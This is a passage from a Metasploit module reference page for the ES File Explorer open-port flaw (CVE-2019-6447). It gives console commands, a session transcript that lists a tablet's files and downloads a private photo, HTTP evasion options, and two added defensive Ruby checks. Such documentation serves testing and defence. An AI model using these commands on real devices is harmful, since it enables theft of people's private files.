ES File Explorer Open Port - Metasploit
This page contains detailed information about how to use the auxiliary/scanner/http/es_file_explorer_open_port Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: ES File Explorer Open Port
Module: auxiliary/scanner/http/es_file_explorer_open_port
Source code: modules/auxiliary/scanner/http/es_file_explorer_open_port.rb
Disclosure date: 2019-01-16
Last modification time: 2020-05-12 22:15:21 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888, 59777
List of CVEs: CVE-2019-6447
This module connects to ES File Explorer's HTTP server to run certain commands. The HTTP server is started on app launch, and is available as long as the app is open. Versions 4.1.9.7.4 and below are reported vulnerable. This module has been tested against 4.1.9.5.1.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
This module is a scanner module, and is capable of testing against multiple hosts.
msf > use auxiliary/scanner/http/es_file_explorer_open_port
msf auxiliary(es_file_explorer_open_port) > show options
... show and set options ...
msf auxiliary(es_file_explorer_open_port) > set RHOSTS ip-range
msf auxiliary(es_file_explorer_open_port) > exploit
Other examples of setting the RHOSTS option:
Example 1:
msf auxiliary(es_file_explorer_open_port) > set RHOSTS 192.168.1.3-192.168.1.200
Example 2:
msf auxiliary(es_file_explorer_open_port) > set RHOSTS 192.168.1.1/24
Example 3:
msf auxiliary(es_file_explorer_open_port) > set RHOSTS file:/tmp/ip_list.txt
Required Options
- RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
Knowledge Base
Vulnerable Application
ES File Explorer has an HTTP server that runs and accepts certain commands. The HTTP server is started on app launch, and is available as long as the app is open. ES File Explorer launches as a service in the background on device boot. Version 4.1.9.7.4 and below are reported vulnerable. This module has been tested against 4.1.9.5.1.
This module includes all functionality from the original POC except for the getAppThumbnail command.
Available actions:
- APPLAUNCH Launch an app. ACTIONITEM required.
- GETDEVICEINFO Get device info
- GETFILE Get a file from the device. ACTIONITEM required.
- LISTAPPS List all the apps installed
- LISTAPPSALL List all the apps installed
- LISTAPPSPHONE List all the phone apps installed
- LISTAPPSSDCARD List all the apk files stored on the sdcard
- LISTAPPSSYSTEM List all the system apps installed
- LISTAUDIOS List all the audio files
- LISTFILES List all the files on the sdcard
- LISTPICS List all the pictures
- LISTVIDEOS List all the videos
Not all of the information from the commands is printed to the screen; however, the original JSON content is stored in loot for reference.
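The affected-version statement above ("4.1.9.7.4 and below") can be turned into an inventory check. The following is an added example, not code from the module or its authors: it reads app inventory lines in the `Label (package) Version: x` shape that the LISTAPPS action prints and flags ES File Explorer installs. The device names, the `4.1.9.8` and `unknown` versions and all function names are constructed for illustration.

```ruby
# Added example, not part of the Metasploit module: audit an app inventory for
# ES File Explorer builds at or below the version the page reports as vulnerable.

ES_PACKAGE      = 'com.estrongs.android.pop' # package name as printed by LISTAPPS
LAST_VULNERABLE = '4.1.9.7.4'                # "4.1.9.7.4 and below are reported vulnerable"

# Inventory line format: "Label (package.name) Version: <version text>"
APP_LINE = /\A(?<label>.+) \((?<package>[A-Za-z0-9_.]+)\) Version: (?<version>.+)\z/

# "4.1.9.5.1" -> [4, 1, 9, 5, 1]. Only the leading dotted-numeric run is used,
# so "12.6.85 (000302-197041431)" -> [12, 6, 85]. Returns nil if there is none.
def version_parts(text)
  lead = text.to_s[/\A\d+(?:\.\d+)*/]
  lead && lead.split('.').map(&:to_i)
end

# Component-wise comparison. The shorter version is padded with zeros so that
# "4.1.9.8" sorts above "4.1.9.7.4". Returns -1, 0 or 1.
def compare_versions(a, b)
  pa = version_parts(a)
  pb = version_parts(b)
  raise ArgumentError, "unparseable version: #{a.inspect} / #{b.inspect}" unless pa && pb

  width = [pa.length, pb.length].max
  pa += [0] * (width - pa.length)
  pb += [0] * (width - pb.length)
  pa <=> pb
end

# Returns { label:, package:, version: } or nil for lines in another format.
def parse_app_line(line)
  m = APP_LINE.match(line.strip)
  m && { label: m[:label], package: m[:package], version: m[:version] }
end

# inventory: { device_name => [inventory lines] }
# Returns one finding per device that has ES File Explorer installed.
def audit_inventory(inventory)
  inventory.each_with_object([]) do |(device, lines), findings|
    lines.each do |line|
      app = parse_app_line(line)
      next unless app && app[:package] == ES_PACKAGE

      status =
        if version_parts(app[:version]).nil?
          :unknown_version # cannot decide automatically, needs a manual look
        elsif compare_versions(app[:version], LAST_VULNERABLE) <= 0
          :reported_vulnerable
        else
          :not_reported_vulnerable
        end
      findings << { device: device, version: app[:version], status: status }
    end
  end
end

# Constructed sample inventory (device names and two of the versions are made up).
SAMPLE_INVENTORY = {
  'tablet-01' => [
    'Chrome (com.android.chrome) Version: 67.0.3396.87',
    'Google Play services (com.google.android.gms) Version: 12.6.85 (000302-197041431)',
    'ES File Explorer (com.estrongs.android.pop) Version: 4.1.9.5.1'
  ],
  'tablet-02' => ['ES File Explorer (com.estrongs.android.pop) Version: 4.1.9.7.4'],
  'phone-03'  => ['ES File Explorer (com.estrongs.android.pop) Version: 4.1.9.8'],
  'phone-04'  => ['ES File Explorer (com.estrongs.android.pop) Version: unknown'],
  'phone-05'  => ['Chrome (com.android.chrome) Version: 67.0.3396.87']
}.freeze

if __FILE__ == $PROGRAM_NAME
  audit_inventory(SAMPLE_INVENTORY).each do |f|
    puts format('%-10s %-12s %s', f[:device], f[:version], f[:status])
  end
end
```

The status `:not_reported_vulnerable` only reflects the version range stated on this page; it is not a statement that later builds are free of other issues.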
Verification Steps
- Install the application
- Start msfconsole
- Do: use modules/auxiliary/scanner/http/es_file_explorer_open_port
- Do: run
- You should get device information
Options
ACTION
The action to perform. See description in Vulnerable Application section for additional details. Default is GETDEVICEINFO.
ACTIONITEM
If running APPLAUNCH or GETFILE, this is the app to launch or file to download.
Scenarios
ES File Explorer 4.1.9.5.1 on a Dragon Touch Y88X on Android 4.4
resource (es.rb)> use modules/auxiliary/scanner/http/es_file_explorer_open_port
resource (es.rb)> set rhosts 1.1.1.1
rhosts => 1.1.1.1
resource (es.rb)> set action GETDEVICEINFO
action => GETDEVICEINFO
resource (es.rb)> run
[+] 1.1.1.1:59777 - Name: Y88X
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
resource (es.rb)> set action LISTFILES
action => LISTFILES
resource (es.rb)> run
[+] 1.1.1.1:59777
folder: bootloader (0.00 Bytes) - 3/23/2019 10:36:51 AM
folder: databk (0.00 Bytes) - 3/23/2019 10:36:49 AM
folder: sdcard (4.00 KB) - 3/23/2019 02:15:24 PM
folder: storage (0.00 Bytes) - 3/23/2019 10:36:49 AM
folder: config (0.00 Bytes) - 3/23/2019 10:36:49 AM
folder: cache (4.00 KB) - 3/24/2019 07:37:46 AM
folder: acct (0.00 Bytes) - 3/23/2019 10:36:49 AM
folder: vendor (4.00 KB) - 1/31/2015 05:56:49 AM
folder: d (0.00 Bytes) - 12/31/1969 07:00:00 PM
folder: etc (4.00 KB) - 2/3/2015 03:51:06 AM
folder: mnt (0.00 Bytes) - 3/23/2019 10:36:49 AM
file: ueventd.sun8i.rc (1.18 KB) - 12/31/1969 07:00:00 PM
file: ueventd.rc (3.93 KB) - 12/31/1969 07:00:00 PM
folder: system (4.00 KB) - 12/31/1969 07:00:00 PM
folder: sys (0.00 Bytes) - 3/23/2019 10:36:45 AM
file: sepolicy (73.82 KB) - 12/31/1969 07:00:00 PM
file: seapp_contexts (656.00 Bytes) - 12/31/1969 07:00:00 PM
folder: sbin (0.00 Bytes) - 12/31/1969 07:00:00 PM
folder: res (0.00 Bytes) - 12/31/1969 07:00:00 PM
file: property_contexts (2.11 KB) - 12/31/1969 07:00:00 PM
folder: proc (0.00 Bytes) - 12/31/1969 07:00:00 PM
file: nand.ko (1.47 MB) - 12/31/1969 07:00:00 PM
file: initlogo.rle (2.34 MB) - 12/31/1969 07:00:00 PM
file: init.usb.rc (3.82 KB) - 12/31/1969 07:00:00 PM
file: init.trace.rc (1.75 KB) - 12/31/1969 07:00:00 PM
file: init.sunxi.wifi.bt.rc (1010.00 Bytes) - 12/31/1969 07:00:00 PM
file: init.sun8i.usb.rc (3.40 KB) - 12/31/1969 07:00:00 PM
file: init.sun8i.rc (4.67 KB) - 12/31/1969 07:00:00 PM
file: init.recovery.sun8i.rc (97.00 Bytes) - 12/31/1969 07:00:00 PM
file: init.rc (23.12 KB) - 12/31/1969 07:00:00 PM
file: init.environ.rc (919.00 Bytes) - 12/31/1969 07:00:00 PM
file: init (183.40 KB) - 12/31/1969 07:00:00 PM
file: fstab.sun8i (1.64 KB) - 12/31/1969 07:00:00 PM
file: file_contexts (9.03 KB) - 12/31/1969 07:00:00 PM
file: default.prop (116.00 Bytes) - 12/31/1969 07:00:00 PM
folder: data (4.00 KB) - 3/23/2019 10:36:52 AM
file: charger (274.11 KB) - 12/31/1969 07:00:00 PM
folder: root (0.00 Bytes) - 1/31/2015 05:24:35 AM
folder: dev (2.62 KB) - 3/23/2019 10:37:14 AM
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
resource (es.rb)> set action LISTVIDEOS
action => LISTVIDEOS
resource (es.rb)> run
[+] 1.1.1.1:59777
DragonTouch-text.mp4 (55.30 MB) - 1/20/1970 10:18:53 PM: /storage/emulated/0/Movies/DragonTouch-text.mp4
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
resource (es.rb)> set action LISTAUDIOS
action => LISTAUDIOS
resource (es.rb)> run
[+] 1.1.1.1:59777
Calendar Notification.ogg (52.89 KB) - 8/6/2015 08:15:30 PM: /storage/emulated/0/Notifications/Calendar Notification.ogg
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
resource (es.rb)> set action LISTAPPSSYSTEM
action => LISTAPPSSYSTEM
resource (es.rb)> run
[+] 1.1.1.1:59777
Package Access Helper (com.android.defcontainer) Version: 4.4.2-20150203
Launcher (com.android.launcher) Version: 4.4.2-20150203
Contacts (com.android.contacts) Version: 4.4.2-20150203
com.android.providers.partnerbookmarks (com.android.providers.partnerbookmarks) Version: 4.4.2-20150203
...snip...
Chrome (com.android.chrome) Version: 67.0.3396.87
Shell (com.android.shell) Version: 4.4.2-20150203
Google Contacts Sync (com.google.android.syncadapters.contacts) Version: 4.4.2-940549
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
resource (es.rb)> set action LISTAPPSPHONE
action => LISTAPPSPHONE
resource (es.rb)> run
[+] 1.1.1.1:59777
Package Access Helper (com.android.defcontainer) Version: 4.4.2-20150203
Launcher (com.android.launcher) Version: 4.4.2-20150203
Contacts (com.android.contacts) Version: 4.4.2-20150203
com.android.providers.partnerbookmarks (com.android.providers.partnerbookmarks) Version: 4.4.2-20150203
Mobile Data (com.android.phone) Version: 4.4.2-20150203
Calculator (com.android.calculator2) Version: 4.4.2-20150203
...snip...
Calendar (com.google.android.calendar) Version: 5.8.28-195646716-release
Face Unlock (com.android.facelock) Version: 4.4.2-940549
Chrome (com.android.chrome) Version: 67.0.3396.87
Shell (com.android.shell) Version: 4.4.2-20150203
Google Contacts Sync (com.google.android.syncadapters.contacts) Version: 4.4.2-940549
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
resource (es.rb)> set action LISTAPPSSDCARD
action => LISTAPPSSDCARD
resource (es.rb)> run
[+] 1.1.1.1:59777
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
resource (es.rb)> set action LISTAPPSALL
action => LISTAPPSALL
resource (es.rb)> run
[+] 1.1.1.1:59777
Package Access Helper (com.android.defcontainer) Version: 4.4.2-20150203
Launcher (com.android.launcher) Version: 4.4.2-20150203
Contacts (com.android.contacts) Version: 4.4.2-20150203
...snip...
com.android.keyguard (com.android.keyguard) Version: 4.4.2-20150203
Calendar (com.google.android.calendar) Version: 5.8.28-195646716-release
Face Unlock (com.android.facelock) Version: 4.4.2-940549
Chrome (com.android.chrome) Version: 67.0.3396.87
Shell (com.android.shell) Version: 4.4.2-20150203
Google Contacts Sync (com.google.android.syncadapters.contacts) Version: 4.4.2-940549
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
resource (es.rb)> set action LISTPICS
action => LISTPICS
resource (es.rb)> run
[+] 1.1.1.1:59777
IMG_20190323_165608.jpg (140.06 KB) - 3/23/2019 04:56:08 PM: /storage/emulated/0/DCIM/Camera/IMG_20190323_165608.jpg
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
resource (es.rb)> set action GETFILE
action => GETFILE
resource (es.rb)> set actionitem /storage/emulated/0/DCIM/Camera/IMG_20190323_165608.jpg
actionitem => /storage/emulated/0/DCIM/Camera/IMG_20190323_165608.jpg
resource (es.rb)> run
[+] 1.1.1.1:59777 - /storage/emulated/0/DCIM/Camera/IMG_20190323_165608.jpg saved to /root/.msf4/loot/20190324073855_default_1.1.1.1_getFile_670725.jpg
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
resource (es.rb)> set action LISTAPPS
action => LISTAPPS
resource (es.rb)> run
[+] 1.1.1.1:59777
TalkBack (com.google.android.marvin.talkback) Version: 5.0.7
Google Play services (com.google.android.gms) Version: 12.6.85 (000302-197041431)
Phone (com.andriod.phone) Version: 1.0
Google Play Music (com.google.android.music) Version: 8.12.7210-1.F
Google Text-to-speech Engine (com.google.android.tts) Version: 3.15.18.200023596
Cloud Print (com.google.android.apps.cloudprint) Version: 1.40
com.softwinner.videotest (com.softwinner.videotest) Version: 1.0
APUS (com.apusapps.launcher) Version: 2.3.1
Settings (com.android.system.io.settings) Version: 11.1.0
DragonPhone (com.softwinner.dragonphone) Version: 1.0
com.mediatek.touch (com.mediatek.touch) Version: 21_zh80001
Google Play Store (com.android.vending) Version: 13.9.17-all [0] [PR] 236777123
com.android.google.settings (com.android.google.settings) Version: 17_zh10317
MainActivity (com.metasploit.stage) Version: 1.0
Gmail (com.google.android.gm) Version: 8.6.3.200445973.release
L-Uninstall (com.clear.uninstall) Version: 2.0
ES File Explorer (com.estrongs.android.pop) Version: 4.1.9.5.1
DragonFire-v2.3 (com.softwinner.dragonfire) Version: 2.3 release
YouTube (com.google.android.youtube) Version: 13.23.59
Calendar (com.google.android.calendar) Version: 5.8.28-195646716-release
Chrome (com.android.chrome) Version: 67.0.3396.87
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
resource (es.rb)> set action APPLAUNCH
action => APPLAUNCH
resource (es.rb)> set actionitem com.android.chrome
actionitem => com.android.chrome
resource (es.rb)> run
[+] 1.1.1.1:59777 - com.android.chrome launched successfully
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
resource (es.rb)> loot
Loot
====
host service type name content info path
---- ------- ---- ---- ------- ---- ----
1.1.1.1 getDeviceInfo.json es_file_explorer_getdeviceinfo.json application/json /root/.msf4/loot/20190324073803_default_1.1.1.1_getDeviceInfo.js_744272.bin
1.1.1.1 listFiles.json es_file_explorer_listfiles.json application/json /root/.msf4/loot/20190324073803_default_1.1.1.1_listFiles.json_522563.bin
1.1.1.1 listVideos.json es_file_explorer_listvideos.json application/json /root/.msf4/loot/20190324073803_default_1.1.1.1_listVideos.json_623335.bin
1.1.1.1 listAudio.json es_file_explorer_listaudio.json application/json /root/.msf4/loot/20190324073803_default_1.1.1.1_listAudio.json_331531.bin
1.1.1.1 listAppsSystem.json es_file_explorer_listappssystem.json application/json /root/.msf4/loot/20190324073821_default_1.1.1.1_listAppsSystem.j_581712.bin
1.1.1.1 listAppsPhone.json es_file_explorer_listappsphone.json application/json /root/.msf4/loot/20190324073838_default_1.1.1.1_listAppsPhone.js_773512.bin
1.1.1.1 listAppsSdcard.json es_file_explorer_listappssdcard.json application/json /root/.msf4/loot/20190324073838_default_1.1.1.1_listAppsSdcard.j_543396.bin
1.1.1.1 listAppsAll.json es_file_explorer_listappsall.json application/json /root/.msf4/loot/20190324073854_default_1.1.1.1_listAppsAll.json_886297.bin
1.1.1.1 listPics.json es_file_explorer_listpics.json application/json /root/.msf4/loot/20190324073855_default_1.1.1.1_listPics.json_831055.bin
1.1.1.1 getFile /storage/emulated/0/DCIM/Camera/IMG_20190323_165608.jpg application/octet-stream /root/.msf4/loot/20190324073855_default_1.1.1.1_getFile_670725.jpg
1.1.1.1 listApps.json es_file_explorer_listapps.json application/json /root/.msf4/loot/20190324073856_default_1.1.1.1_listApps.json_189709.bin
Msfconsole Usage
Here is how the scanner/http/es_file_explorer_open_port auxiliary module looks in the msfconsole:
msf6 > use auxiliary/scanner/http/es_file_explorer_open_port
msf6 auxiliary(scanner/http/es_file_explorer_open_port) > show info
Name: ES File Explorer Open Port
Module: auxiliary/scanner/http/es_file_explorer_open_port
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2019-01-16
Provided by:
moonbocal
fs0c131y
h00die
Available actions:
Name Description
---- -----------
APPLAUNCH Launch an app. ACTIONITEM required.
GETDEVICEINFO Get device info
GETFILE Get a file from the device. ACTIONITEM required.
LISTAPPS List all the apps installed
LISTAPPSALL List all the apps installed
LISTAPPSPHONE List all the phone apps installed
LISTAPPSSDCARD List all the apk files stored on the sdcard
LISTAPPSSYSTEM List all the system apps installed
LISTAUDIOS List all the audio files
LISTFILES List all the files on the sdcard
LISTPICS List all the pictures
LISTVIDEOS List all the videos
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
ACTIONITEM no If an app or filename if required by the action
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 59777 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
THREADS 1 yes The number of concurrent threads (max one per host)
VHOST no HTTP server virtual host
Description:
This module connects to ES File Explorer's HTTP server to run
certain commands. The HTTP server is started on app launch, and is
available as long as the app is open. Version 4.1.9.7.4 and below
are reported vulnerable This module has been tested against
4.1.9.5.1.
References:
https://nvd.nist.gov/vuln/detail/CVE-2019-6447
https://www.ms509.com/2016/03/01/es-explorer-vul/
https://github.com/fs0c131y/ESFileExplorerOpenPortVuln
https://twitter.com/fs0c131y/status/1085460755313508352
Module Options
This is a complete list of options available in the scanner/http/es_file_explorer_open_port auxiliary module:
msf6 auxiliary(scanner/http/es_file_explorer_open_port) > show options
Module options (auxiliary/scanner/http/es_file_explorer_open_port):
Name Current Setting Required Description
---- --------------- -------- -----------
ACTIONITEM no If an app or filename if required by the action
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 59777 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
THREADS 1 yes The number of concurrent threads (max one per host)
VHOST no HTTP server virtual host
Auxiliary action:
Name Description
---- -----------
GETDEVICEINFO Get device info
Advanced Options
Here is a complete list of advanced options supported by the scanner/http/es_file_explorer_open_port auxiliary module:
msf6 auxiliary(scanner/http/es_file_explorer_open_port) > show advanced
Module advanced options (auxiliary/scanner/http/es_file_explorer_open_port):
Name Current Setting Required Description
---- --------------- -------- -----------
DOMAIN WORKSTATION yes The domain to use for Windows authentication
DigestAuthIIS true no Conform to IIS, should work for most servers. Only set to false for non-IIS servers
FingerprintCheck true no Conduct a pre-exploit fingerprint verification
HttpClientTimeout no HTTP connection and receive timeout
HttpPassword no The HTTP password to specify for authentication
HttpRawHeaders no Path to ERB-templatized raw headers to append to existing headers
HttpTrace false no Show the raw HTTP requests and responses
HttpTraceColors red/blu no HTTP request and response colors for HttpTrace (unset to disable)
HttpTraceHeadersOnly false no Show HTTP headers only in HttpTrace
HttpUsername no The HTTP username to specify for authentication
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
ShowProgress true yes Display progress messages during a scan
ShowProgressPercent 10 yes The interval in percent that progress should be shown
UserAgent Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) no The User-Agent header to use for all requests
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
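For defenders, the defaults listed above (RPORT 59777, the default UserAgent string) and the request methods visible in the module source (POST for commands, GET with the file path as URI for GETFILE) give enough to triage HTTP logs. The following is an added example, not code from the module: the tab-separated log layout, the sample records, the sweep threshold and all function names are assumptions made for illustration.

```ruby
# Added example, not part of the Metasploit module: triage HTTP log records for
# requests to ES File Explorer's listener port, grouped by source address.

ES_PORT         = 59777 # RPORT default from the module options
DEFAULT_UA      = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)' # UserAgent default (advanced options)
SWEEP_MIN_HOSTS = 3     # assumption: distinct targets from one source that count as a sweep

Record = Struct.new(:ts, :src, :dst, :dport, :verb, :uri, :user_agent)

# Hypothetical log layout, tab-separated: ts, src, dst, dport, method, uri, user-agent.
# Lines that do not have seven fields or a numeric port are skipped.
def parse_records(lines)
  lines.each_with_object([]) do |line, out|
    f = line.chomp.split("\t", 7)
    next unless f.length == 7 && f[3] =~ /\A\d+\z/

    out << Record.new(f[0], f[1], f[2], f[3].to_i, f[4].upcase, f[5], f[6])
  end
end

# Returns { src => { hosts:, commands:, file_requests:, default_ua:, sweep: } }.
# The port is the primary signal. The User-Agent is a module option, so a match
# on the default is only a supporting hint and its absence proves nothing.
def triage(records, sweep_min_hosts: SWEEP_MIN_HOSTS)
  by_src = {}
  records.each do |r|
    next unless r.dport == ES_PORT

    s = (by_src[r.src] ||= { hosts: [], commands: 0, file_requests: [], default_ua: false })
    s[:hosts] |= [r.dst]
    case r.verb
    when 'POST' then s[:commands] += 1          # the module issues commands with http_post
    when 'GET'  then s[:file_requests] << r.uri # GETFILE sends a GET with the file path as URI
    end
    s[:default_ua] = true if r.user_agent == DEFAULT_UA
  end
  # The module is a scanner that accepts host ranges, so one source touching
  # several devices on this port is worth escalating.
  by_src.each_value { |s| s[:sweep] = s[:hosts].length >= sweep_min_hosts }
  by_src
end

# Constructed sample records (addresses, timestamps and the second User-Agent are made up).
SAMPLE_LINES = ([
  ['2019-03-24T07:38:03Z', '10.0.5.23', '10.0.5.101', '59777', 'POST', '/', DEFAULT_UA],
  ['2019-03-24T07:38:04Z', '10.0.5.23', '10.0.5.102', '59777', 'POST', '/', DEFAULT_UA],
  ['2019-03-24T07:38:05Z', '10.0.5.23', '10.0.5.103', '59777', 'POST', '/', DEFAULT_UA],
  ['2019-03-24T07:38:55Z', '10.0.5.23', '10.0.5.103', '59777', 'GET',
   '/storage/emulated/0/DCIM/Camera/IMG_20190323_165608.jpg', DEFAULT_UA],
  ['2019-03-24T08:02:10Z', '10.0.5.40', '10.0.5.101', '59777', 'post', '/', 'example-client/1.0'],
  ['2019-03-24T08:02:11Z', '10.0.5.40', '10.0.5.9', '8080', 'GET', '/index.html', 'example-client/1.0']
].map { |fields| fields.join("\t") } + ['truncated record']).freeze

if __FILE__ == $PROGRAM_NAME
  triage(parse_records(SAMPLE_LINES)).each do |src, s|
    puts "#{src}: hosts=#{s[:hosts].length} commands=#{s[:commands]} " \
         "files=#{s[:file_requests].length} default_ua=#{s[:default_ua]} sweep=#{s[:sweep]}"
  end
end
```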
Auxiliary Actions
This is a list of all auxiliary actions that the scanner/http/es_file_explorer_open_port module can do:
msf6 auxiliary(scanner/http/es_file_explorer_open_port) > show actions
Auxiliary actions:
Name Description
---- -----------
APPLAUNCH Launch an app. ACTIONITEM required.
GETDEVICEINFO Get device info
GETFILE Get a file from the device. ACTIONITEM required.
LISTAPPS List all the apps installed
LISTAPPSALL List all the apps installed
LISTAPPSPHONE List all the phone apps installed
LISTAPPSSDCARD List all the apk files stored on the sdcard
LISTAPPSSYSTEM List all the system apps installed
LISTAUDIOS List all the audio files
LISTFILES List all the files on the sdcard
LISTPICS List all the pictures
LISTVIDEOS List all the videos
Evasion Options
Here is the full list of possible evasion options supported by the scanner/http/es_file_explorer_open_port auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(scanner/http/es_file_explorer_open_port) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
HTTP::header_folding false no Enable folding of HTTP headers
HTTP::method_random_case false no Use random casing for the HTTP method
HTTP::method_random_invalid false no Use a random invalid, HTTP method for request
HTTP::method_random_valid false no Use a random, but valid, HTTP method for request
HTTP::pad_fake_headers false no Insert random, fake headers into the HTTP request
HTTP::pad_fake_headers_count 0 no How many fake headers to insert into the HTTP request
HTTP::pad_get_params false no Insert random, fake query string variables into the request
HTTP::pad_get_params_count 16 no How many fake query string variables to insert into the request
HTTP::pad_method_uri_count 1 no How many whitespace characters to use between the method and uri
HTTP::pad_method_uri_type space no What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
HTTP::pad_post_params false no Insert random, fake post variables into the request
HTTP::pad_post_params_count 16 no How many fake post variables to insert into the request
HTTP::pad_uri_version_count 1 no How many whitespace characters to use between the uri and version
HTTP::pad_uri_version_type space no What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
HTTP::uri_dir_fake_relative false no Insert fake relative directories into the uri
HTTP::uri_dir_self_reference false no Insert self-referential directories into the uri
HTTP::uri_encode_mode hex-normal no Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
HTTP::uri_fake_end false no Add a fake end of URI (eg: /%20HTTP/1.0/../../)
HTTP::uri_fake_params_start false no Add a fake start of params to the URI (eg: /%3fa=b/../)
HTTP::uri_full_url false no Use the full URL for all HTTP requests
HTTP::uri_use_backslashes false no Use back slashes instead of forward slashes in the uri
HTTP::version_random_invalid false no Use a random invalid, HTTP version for request
HTTP::version_random_valid false no Use a random, but valid, HTTP version for request
Error Messages
This module may fail with the following error messages:
- <PEER>- Error Connecting
- <PEER>- Not Vulnerable or Bad Response
- Action item is a path for GETFILE, like /system/app/Browser.apk
- <PEER>- Not Vulnerable, Bad Response. File may not be available for download.
- Action item is a path for GETFILE, like com.android.chrome
- <PEER>- Application <ACTIONITEM> not found on device
Check for the possible causes in the code snippets below, taken from the module source code. This can often help in identifying the root cause of the problem.
<PEER>- Error Connecting
Here is a relevant code snippet related to the "<PEER>- Error Connecting" error message:
74: def run_host(target_host)
75: case
76: when action.name == 'LISTFILES'
77: res = http_post('listFiles')
78: unless res
79: print_error("#{peer}- Error Connecting")
80: return
81: end
82: unless res.code == 200
83: print_error("#{peer}- Not Vulnerable or Bad Response")
84: return
<PEER>- Not Vulnerable or Bad Response
Here is a relevant code snippet related to the "<PEER>- Not Vulnerable or Bad Response" error message:
78: unless res
79: print_error("#{peer}- Error Connecting")
80: return
81: end
82: unless res.code == 200
83: print_error("#{peer}- Not Vulnerable or Bad Response")
84: return
85: end
86: path = store_loot('listFiles.json', 'application/json', target_host, res.body, 'es_file_explorer_listfiles.json')
87: vprint_good("#{peer}- Result saved to #{path}")
88: json_resp = JSON.parse(sanitize_json(res.body))
<PEER>- Error Connecting
Here is a relevant code snippet related to the "<PEER>- Error Connecting" error message:
92: end
93: print_good(pretty_response)
94: when action.name == 'LISTPICS'
95: res = http_post('listPics')
96: unless res
97: print_error("#{peer}- Error Connecting")
98: return
99: end
100: unless res.code == 200
101: print_error("#{peer}- Not Vulnerable or Bad Response")
102: return
<PEER>- Not Vulnerable or Bad Response
Here is a relevant code snippet related to the "<PEER>- Not Vulnerable or Bad Response" error message:
96: unless res
97: print_error("#{peer}- Error Connecting")
98: return
99: end
100: unless res.code == 200
101: print_error("#{peer}- Not Vulnerable or Bad Response")
102: return
103: end
104: path = store_loot('listPics.json', 'application/json', target_host, res.body, 'es_file_explorer_listpics.json')
105: vprint_good("#{peer}- Result saved to #{path}")
106: json_resp = JSON.parse(sanitize_json(res.body))
<PEER>- Error Connecting
Here is a relevant code snippet related to the "<PEER>- Error Connecting" error message:
110: end
111: print_good(pretty_response)
112: when action.name == 'LISTVIDEOS'
113: res = http_post('listVideos')
114: unless res
115: print_error("#{peer}- Error Connecting")
116: return
117: end
118: unless res.code == 200
119: print_error("#{peer}- Not Vulnerable or Bad Response")
120: return
<PEER>- Not Vulnerable or Bad Response
Here is a relevant code snippet related to the "<PEER>- Not Vulnerable or Bad Response" error message:
114: unless res
115: print_error("#{peer}- Error Connecting")
116: return
117: end
118: unless res.code == 200
119: print_error("#{peer}- Not Vulnerable or Bad Response")
120: return
121: end
122: path = store_loot('listVideos.json', 'application/json', target_host, res.body, 'es_file_explorer_listvideos.json')
123: vprint_good("#{peer}- Result saved to #{path}")
124: json_resp = JSON.parse(sanitize_json(res.body))
<PEER>- Error Connecting
Here is a relevant code snippet related to the "<PEER>- Error Connecting" error message:
128: end
129: print_good(pretty_response)
130: when action.name == 'LISTAUDIOS'
131: res = http_post('listAudios')
132: unless res
133: print_error("#{peer}- Error Connecting")
134: return
135: end
136: unless res.code == 200
137: print_error("#{peer}- Not Vulnerable or Bad Response")
138: return
<PEER>- Not Vulnerable or Bad Response
Here is a relevant code snippet related to the "<PEER>- Not Vulnerable or Bad Response" error message:
132: unless res
133: print_error("#{peer}- Error Connecting")
134: return
135: end
136: unless res.code == 200
137: print_error("#{peer}- Not Vulnerable or Bad Response")
138: return
139: end
140: path = store_loot('listAudio.json', 'application/json', target_host, res.body, 'es_file_explorer_listaudio.json')
141: vprint_good("#{peer}- Result saved to #{path}")
142: json_resp = JSON.parse(sanitize_json(res.body))
<PEER>- Error Connecting
Here is a relevant code snippet related to the "<PEER>- Error Connecting" error message:
146: end
147: print_good(pretty_response)
148: when action.name == 'LISTAPPS'
149: res = http_post('listApps')
150: unless res
